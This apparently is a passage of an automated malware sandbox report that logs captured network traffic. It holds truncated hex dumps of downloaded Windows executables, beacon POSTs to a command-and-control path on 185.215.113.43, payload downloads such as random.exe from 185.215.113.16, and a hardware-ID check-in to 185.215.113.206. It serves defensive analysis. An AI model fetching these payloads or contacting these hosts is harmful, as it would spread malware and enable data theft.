00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:10 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:13 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 20 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4e 00 00 04 00 00 8f dc 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 0a 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0a 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2c 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6f 64 6b 73 63 63 62 00 f0 1a 00 00 20 33 00 00 ec 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 65 6f 6a 71 62 6b 7a 00 10 00 00 00 10 4e 00 00 04 00 00 00 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4e 00 00 22 00 00 00 e6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:27 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 1f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 74 6f 6b 71 65 6f 73 00 a0 29 00 00 a0 00 00 00 98 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 74 6e 74 68 6d 70 00 20 00 00 00 40 2a 00 00 04 00 00 00 d2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:37 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 20 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4e 00 00 04 00 00 8f dc 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 0a 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0a 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2c 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6f 64 6b 73 63 63 62 00 f0 1a 00 00 20 33 00 00 ec 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 65 6f 6a 71 62 6b 7a 00 10 00 00 00 10 4e 00 00 04 00 00 00 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4e 00 00 22 00 00 00 e6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:49 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 1f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 74 6f 6b 71 65 6f 73 00 a0 29 00 00 a0 00 00 00 98 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 74 6e 74 68 6d 70 00 20 00 00 00 40 2a 00 00 04 00 00 00 d2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:51 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 20 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4e 00 00 04 00 00 8f dc 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 0a 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0a 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2c 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6f 64 6b 73 63 63 62 00 f0 1a 00 00 20 33 00 00 ec 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 65 6f 6a 71 62 6b 7a 00 10 00 00 00 10 4e 00 00 04 00 00 00 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4e 00 00 22 00 00 00 e6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003036001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003037001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 39 33 37 35 32 30 46 33 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="hwid"62937520F30F807656615------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="build"tale------JEBKEHJJDAAAAKECBGHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 30 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003038001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
